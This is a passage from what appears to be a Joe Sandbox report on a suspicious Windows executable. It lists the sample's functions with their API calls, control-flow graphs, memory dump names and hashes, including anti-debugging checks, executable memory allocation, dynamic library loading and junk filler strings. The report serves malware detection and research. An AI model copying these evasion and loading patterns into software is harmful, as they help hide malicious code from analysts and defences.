                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00402A78
                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00402A7E
                                                        • SetEnvironmentVariableA.KERNEL32(00000000,?), ref: 00402A8D
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A9F
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00402AAC
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                                        • String ID:
                                                        • API String ID: 4163992861-0
                                                        • Opcode ID: de64801f7f8460ace1fac7cd90a485005b25414184570f5667c97c45307c5d74
                                                        • Instruction ID: b63d3673e0c5033209ebad036fb76a060e8bb29fbe4bc934e374f6f9c6a1ff10
                                                        • Opcode Fuzzy Hash: de64801f7f8460ace1fac7cd90a485005b25414184570f5667c97c45307c5d74
                                                        • Instruction Fuzzy Hash: 0F218735784304BBF760AB95DE4AF997764DB44B12F104065F748BA1D0CEB05984CB79
                                                        Function 0040841C Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0040B438
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B44D
                                                        • UnhandledExceptionFilter.KERNEL32(00401BEC), ref: 0040B458
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B474
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0040B47B
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: bf13f82d5f95a5b9219731cc4d6641717ffd92efd21975278bd15d779f98045f
                                                        • Instruction ID: 1ba73b8f49e8f5d1db2b3cc3a21a518c391241100f22d2c72230a76073541b3b
                                                        • Opcode Fuzzy Hash: bf13f82d5f95a5b9219731cc4d6641717ffd92efd21975278bd15d779f98045f
                                                        • Instruction Fuzzy Hash: 7121FDBD811204EFD300DF64F9896493BB0FB1A300F22407AE948A76B1E7B4598ACF4D
                                                        Function 00402DF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 258 402df0-403125 259 403127-40312c 258->259 260 403136-40313d 259->260 261 40312e-403134 259->261 262 403142 call 402ae0 260->262 261->259 261->260 263 403147-40314d 262->263 264 403152-40315c 263->264 265 403169-40316c 264->265 266 40315e-403167 GetCurrentDirectoryA 264->266 265->264 267 40316e-403175 265->267 266->265
                                                        APIs
                                                        • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,5C9ABF6F,1E034062,2035442F,53C07D34,782066B0,63C41FAC,0CB4B4DE,39A1128B,15DE494B,51091788,6E94626D,51091788), ref: 00403167
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: /D5 $K*w$l_H)
                                                        • API String ID: 1611563598-2127717106
                                                        • Opcode ID: 7ff80d827485dd1fbdc2d360fa7c585fdb13e0cb258b49fc037fd4da5eede4d1
                                                        • Instruction ID: e8bc9cc4fbe0acd5bef36109addc99e941147015c112cfba499ea01668a1ed68
                                                        • Opcode Fuzzy Hash: 7ff80d827485dd1fbdc2d360fa7c585fdb13e0cb258b49fc037fd4da5eede4d1
                                                        • Instruction Fuzzy Hash: 58A1CAB9E012589BCF04CFEAD9895DDFBB5FF18310F248108E812BBA14D3709A858F55
                                                        Function 00407345 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00007303), ref: 0040734A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 19311c34a9d4baa823216694b248ebb2eaa35a89abd0ded209ca0d3f4a86d0b4
                                                        • Instruction ID: 86083c40b31e47b7b7a57c8522e6a5e19468ab9a25b49b711df96938c8b9ed54
                                                        • Opcode Fuzzy Hash: 19311c34a9d4baa823216694b248ebb2eaa35a89abd0ded209ca0d3f4a86d0b4
                                                        • Instruction Fuzzy Hash: 179022A02000028AE30003300C0A00020800A08B02B02803A2880E0CA0EA300080B00A
                                                        Function 00402AE0 Relevance: 54.5, APIs: 24, Strings: 7, Instructions: 219librarymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • SetLastError.KERNEL32(00000000), ref: 00402AF7
                                                        • DefineDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00402B1F
                                                        • _malloc.LIBCMT ref: 00402B26
                                                        • _realloc.LIBCMT ref: 00402B30
                                                        • OpenJobObjectW.KERNEL32(00000000,00000000,nawis), ref: 00402B6A
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402B74
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00402BDE
                                                        • GetTickCount.KERNEL32 ref: 00402BF4
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C37
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 00402C3E
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00402C4E
                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402C88
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402C90
                                                        • OpenEventW.KERNEL32(00000000,00000000,00000000), ref: 00402C9C
                                                        • GetCurrentProcess.KERNEL32 ref: 00402CC8
                                                        • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 00402CD2
                                                        • GetLastError.KERNEL32 ref: 00402CF0
                                                        • GetFileAttributesA.KERNEL32(sayemexesukayevudadotukawakebal), ref: 00402D41
                                                        • GetShortPathNameA.KERNEL32(jowalaserenadecibaf,?,00000000), ref: 00402D51
                                                        • GlobalCompact.KERNEL32(00000000), ref: 00402D55
                                                        • GetEnvironmentStrings.KERNEL32 ref: 00402D57
                                                        • SetComputerNameW.KERNEL32(zodow), ref: 00402D62
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00402D77
                                                        • LoadLibraryA.KERNEL32(0044F9C8), ref: 00402DDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$Exchange$ErrorLastLibraryLoadNameOpen$AllocAttributesCharCompactComputerConsoleCountCurrentDefineDeviceEnvironmentEventFileGlobalIncrementInputObjectPathProcessReadShortStringStringsTickVirtualWidth32_malloc_realloc
                                                        • String ID: %s %f %c$Bq $jowalaserenadecibaf$nawis$sayemexesukayevudadotukawakebal$zodow${
                                                        • API String ID: 2828681805-4159871415
                                                        • Opcode ID: b7bc834f5fd41e4760b8ab7829b546fb1a8d5297e328fe11c9040408e6bdcedb
                                                        • Instruction ID: 14f4dd021938527547b7e4df40446ce02b6bf67af537f9d54bbeee514953ad6b
                                                        • Opcode Fuzzy Hash: b7bc834f5fd41e4760b8ab7829b546fb1a8d5297e328fe11c9040408e6bdcedb
                                                        • Instruction Fuzzy Hash: 8F813BB1D00340EFE710AF74EE89B9A7B68FB14305F14443AE545772E2CAB85949CBAD
                                                        Function 00403194 Relevance: 13.7, APIs: 9, Instructions: 159COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 147 403194-4031bd call 404609 150 403239-403243 147->150 151 4031bf-4031d0 call 403d8c 147->151 152 403245-403261 call 403dec 150->152 153 4031fc-403205 call 404609 150->153 159 4031d2-4031d5 151->159 160 40320a-40322a 151->160 162 403270-403279 152->162 163 403263-40326c 152->163 165 40333f 153->165 159->153 164 4031d7-4031da 159->164 166 40322c-403234 call 404510 160->166 170 403284-4032a5 call 403ea5 162->170 171 40327b-403282 162->171 167 4032e7 163->167 168 40326e 163->168 164->160 169 4031dc-4031f7 call 4044af 164->169 172 403342-403345 165->172 166->172 174 4032ed-403306 167->174 168->171 169->172 184 4032a6-4032b0 170->184 171->170 176 4032b5-4032ba 171->176 174->166 181 4032e0-4032e5 176->181 182 4032bc-4032de call 403d60 176->182 181->167 183 40330b-403310 181->183 182->184 186 403312-403325 call 403d60 183->186 187 403327-40333c call 403d60 call 404609 183->187 184->166 186->174 187->165
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __ctrlfp__set_exp$__copysign__decomp__except2__umatherr
                                                        • String ID:
                                                        • API String ID: 2834391352-0
                                                        • Opcode ID: 092f6b4d6b20046c28fce046914ff99c7ebdd3a409ccf955a3c78dc936452d79
                                                        • Instruction ID: 32bb5e4a2de3f5fc311397bd84b74097e96737e5ff5a7b0edae0b3d6eed127e7
                                                        • Opcode Fuzzy Hash: 092f6b4d6b20046c28fce046914ff99c7ebdd3a409ccf955a3c78dc936452d79
                                                        • Instruction Fuzzy Hash: CE41D37140850AE6DB047F25EC4AA7B7E6CEF85305F2049AEF9D5A40C1EE398674835E
                                                        Function 0040A194 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 205 40a194-40a1af call 4053f4 call 407d9b 210 40a1b1-40a1b5 205->210 211 40a1ce-40a1e6 call 4048fc 205->211 210->211 213 40a1b7 210->213 216 40a1e8-40a1ea 211->216 217 40a21e-40a22a call 40a22f 211->217 215 40a1ba-40a1bc 213->215 218 40a1c6-40a1cd call 405439 215->218 219 40a1be-40a1c5 call 40563c 215->219 220 40a206-40a218 InterlockedIncrement 216->220 221 40a1ec-40a1f5 InterlockedDecrement 216->221 217->215 219->218 220->217 221->220 226 40a1f7-40a1fd 221->226 226->220 229 40a1ff-40a205 call 407275 226->229 229->220
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040A1A0
                                                          • Part of subcall function 00407D9B: __getptd_noexit.LIBCMT ref: 00407D9E
                                                          • Part of subcall function 00407D9B: __amsg_exit.LIBCMT ref: 00407DAB
                                                        • __amsg_exit.LIBCMT ref: 0040A1C0
                                                        • __lock.LIBCMT ref: 0040A1D0
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0040A1ED
                                                        • InterlockedIncrement.KERNEL32(022D1878), ref: 0040A218
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 4271482742-0
                                                        • Opcode ID: 5e8f35dabc685dccc16ba7a3a69a84647a7b758179c7feffaa6ddfdd5855884b
                                                        • Instruction ID: 6ce619eef8981f8b1ae415ca912ce3841918b27f7b0c59c687113e4e5a4dbb1b
                                                        • Opcode Fuzzy Hash: 5e8f35dabc685dccc16ba7a3a69a84647a7b758179c7feffaa6ddfdd5855884b
                                                        • Instruction Fuzzy Hash: 89015A31900B11ABDB20AF699849B5B72A0AF01754F04407AE8107B3E1CB386CA1DB9E
                                                        Function 00407275 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 232 407275-407286 call 4053f4 235 407288-40728f 232->235 236 4072fd-407302 call 405439 232->236 238 407291-4072a9 call 4048fc call 40492f 235->238 239 4072d4 235->239 250 4072b4-4072c4 call 4072cb 238->250 251 4072ab-4072b3 call 40495f 238->251 242 4072d5-4072e5 HeapFree 239->242 242->236 244 4072e7-4072fc call 405b6a GetLastError call 405b28 242->244 244->236 250->236 257 4072c6-4072c9 250->257 251->250 257->242
                                                        APIs
                                                        • __lock.LIBCMT ref: 00407293
                                                          • Part of subcall function 004048FC: __mtinitlocknum.LIBCMT ref: 00404912
                                                          • Part of subcall function 004048FC: __amsg_exit.LIBCMT ref: 0040491E
                                                          • Part of subcall function 004048FC: EnterCriticalSection.KERNEL32(?,?,?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001), ref: 00404926
                                                        • ___sbh_find_block.LIBCMT ref: 0040729E
                                                        • ___sbh_free_block.LIBCMT ref: 004072AD
                                                        • HeapFree.KERNEL32(00000000,74DEDFA0,00447480,0000000C,004048DD,00000000,00447440,0000000C,00404917,74DEDFA0,?,?,0040BBD5,00000004,00447678,0000000C), ref: 004072DD
                                                        • GetLastError.KERNEL32(?,0040BBD5,00000004,00447678,0000000C,00409142,74DEDFA0,?,00000000,00000000,00000000,?,00407D4D,00000001,00000214), ref: 004072EE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2714421763-0
                                                        • Opcode ID: ba8200ea433a492001e46b66f40bd743269361a4f72e1a255c6a746ad7319126
                                                        • Instruction ID: 80b134d7ac9c9eaedb2e3b0dfe896a216977181ecac5a5684c636fd801acfee0
                                                        • Opcode Fuzzy Hash: ba8200ea433a492001e46b66f40bd743269361a4f72e1a255c6a746ad7319126
                                                        • Instruction Fuzzy Hash: A2018F71D04705AADB207BB2AC0675F3A60EF01729F2041BFF404761E1CA7CA9809F6E
                                                        Function 0040904F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 268 40904f-40905c GetModuleHandleA 269 409073 268->269 270 40905e-40906c GetProcAddress 268->270 273 409046-40904a 269->273 274 40904b-40904e 269->274 270->269 271 40906e-409072 270->271
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040476C), ref: 00409054
                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                        • API String ID: 1646373207-3105848591
                                                        • Opcode ID: 69c6bfb2c1734e98e99d65c23525dc4cd92684a478a12a5edbe453cde73d28d8
                                                        • Instruction ID: c47841d6f15702497504f94e74aea390dd9ff62f7b27ea2c71da9afd6bd97b3b
                                                        • Opcode Fuzzy Hash: 69c6bfb2c1734e98e99d65c23525dc4cd92684a478a12a5edbe453cde73d28d8
                                                        • Instruction Fuzzy Hash: E7F03030B00A09D2DB101FB1BE0EAAF7A78BB80742F9105A1A1D2B00E5DF3885B1D74A
                                                        Function 0040F928 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 276 40f928-40f939 277 40f950 276->277 278 40f93b-40f93e 276->278 280 40f952-40f955 277->280 278->277 279 40f940-40f942 278->279 281 40f944-40f949 279->281 282 40f956-40f967 call 405bea 279->282 281->277 283 40f94b-40f94d 281->283 286 40f988-40f999 call 40b0ba 282->286 287 40f969-40f96e 282->287 283->277 294 40fa18-40fa37 MultiByteToWideChar 286->294 295 40f99b-40f9a7 286->295 289 40f970-40f974 287->289 290 40f977-40f97a 287->290 289->290 291 40f983-40f986 290->291 292 40f97c-40f97f 290->292 291->280 292->291 294->290 296 40fa3d 294->296 297 40f9a9-40f9ac 295->297 298 40f9ce-40f9d7 295->298 299 40f9f9-40fa07 call 405b6a 296->299 297->298 300 40f9ae-40f9cc MultiByteToWideChar 297->300 298->299 301 40f9d9-40f9dc 298->301 306 40fa10-40fa13 299->306 307 40fa09-40fa0c 299->307 300->298 302 40f9de-40f9e7 300->302 301->299 301->302 302->280 304 40f9ed-40f9f4 302->304 304->280 306->280 307->306
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040F95C
                                                        • __isleadbyte_l.LIBCMT ref: 0040F990
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040F9C1
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040FA2F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 1da80a83d1b9d2fba61b0aad7d73fd650536e3805d164c76baaab22e8e6ed2e8
                                                        • Instruction ID: e67126559a7a37c5cdbc954f30bef8da80ee2d41740c3d934f602765f49ef9e5
                                                        • Opcode Fuzzy Hash: 1da80a83d1b9d2fba61b0aad7d73fd650536e3805d164c76baaab22e8e6ed2e8
                                                        • Instruction Fuzzy Hash: 4031A071A00246FFCB30EF64C880BAA3BA5AF01310B14457AE465AB6E1D334AD49DB59
                                                        Function 00408F1A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 308 408f1a-408f25 309 408f86-408f98 call 40880b 308->309 310 408f27-408f2a 308->310 313 408f9d-408fa1 309->313 310->309 312 408f2c-408f2f 310->312 314 408f31-408f49 call 408d65 312->314 315 408f4a-408f4d 312->315 317 408f6d-408f84 call 4088fb 315->317 318 408f4f-408f52 315->318 317->313 318->317 320 408f54-408f6b call 408e20 318->320 320->313
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction ID: 6b11bb3ef8c0e136fb443cce1273c4a9b5b63ea59267b3f3c51b92bb063b1e71
                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction Fuzzy Hash: 1F11473200414EFFCF126E95CD05CEE3F63BB18354B59852AFE9865171CA3AC971AB85
                                                        Function 0040A900 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 325 40a900-40a91b call 4053f4 call 407d9b 330 40a91d-40a921 325->330 331 40a93f-40a968 call 4048fc call 40a8c2 call 40a96a 325->331 330->331 332 40a923-40a928 call 407d9b 330->332 339 40a92b-40a92d 331->339 332->339 341 40a937-40a93e call 405439 339->341 342 40a92f-40a936 call 40563c 339->342 342->341
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040A90C
                                                          • Part of subcall function 00407D9B: __getptd_noexit.LIBCMT ref: 00407D9E
                                                          • Part of subcall function 00407D9B: __amsg_exit.LIBCMT ref: 00407DAB
                                                        • __getptd.LIBCMT ref: 0040A923
                                                        • __amsg_exit.LIBCMT ref: 0040A931
                                                        • __lock.LIBCMT ref: 0040A941
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmpDownload File
